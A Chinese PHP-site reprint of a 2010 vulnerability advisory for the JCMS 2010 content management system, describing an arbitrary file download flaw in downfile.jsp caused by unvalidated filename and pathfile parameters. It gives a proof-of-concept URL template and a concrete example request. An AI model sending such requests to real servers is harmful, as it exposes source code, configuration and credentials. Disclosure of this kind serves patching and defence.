文章详情

Php文档 Php问答 行业资讯 Php论坛 Php手册 Php博客
  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
关闭搜索
php爱好者> php文档>JCMS 2010 任意文件下载漏洞

JCMS 2010 任意文件下载漏洞

时间:2010-11-23  来源:Beach

发布日期:2010-11.23
发布作者:Beach

影响版本:V2010
官方地址:http://www.hanweb.com/

漏洞类型:文件下载
漏洞描述:JCMS 2010 downfile.jsp下载存在漏洞,可构造下载任意文件。

Description:

 

In /module/download/downfile.jsp ,filename and pathfile didn't verify user's input

So this vulnerability allows an attacker to download any files .

 

[*]POC:

 

http://server/module/download/downfile.jsp?filename=[file_name]&pathfile=[Path/Path/file_name]

 

[*]I.E:

 

http://server/module/download/downfile.jsp?filename=downfile.jsp&pathfile=module/download/downfile.jsp
 

 

标签分类: 文件下载

相关阅读 更多 +
排行榜 更多 +
瓢虫少女

瓢虫少女

飞行射击 下载
潜艇鱼雷

潜艇鱼雷

飞行射击 下载
网络掠夺者

网络掠夺者

飞行射击 下载

Copyright 2006-2020 (phpxiu.com) All Rights Reserved.

本站为非盈利性网站,不接受任何广告。php爱好者